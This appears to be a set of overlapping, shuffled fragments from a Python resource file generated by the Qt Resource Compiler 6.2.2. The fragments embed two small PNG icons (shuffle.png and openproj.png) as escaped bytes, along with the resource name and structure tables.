"\\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\",
"# Created by: object code # Created by: The Resource Compiler for Qt",
"8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\",
"b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a",
"\\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\",
"3) # Created by: object code # Created by: The Resource Compiler for",
"%\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\",
"\\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\",
"The Resource Compiler for Qt version 6.2.2 # WARNING! All changes made in",
".\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\",
"\" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\",
"]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\",
"\\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\",
"by: object code # Created by: The Resource Compiler for Qt version 6.2.2",
"\\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\",
"^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\",
"\\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name",
"Compiler for Qt version 6.2.2 # WARNING! All changes made in this file",
"\\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\",
"-\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\",
"\\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\",
"*\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\",
"\\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\",
"\\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\",
"+\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\",
"\\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\",
"Created by: object code # Created by: The Resource Compiler for Qt version",
"= b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources():",
"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct,",
"\\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\",
"]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\",
"6.2.2 # WARNING! All changes made in this file will be lost! from",
"sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\",
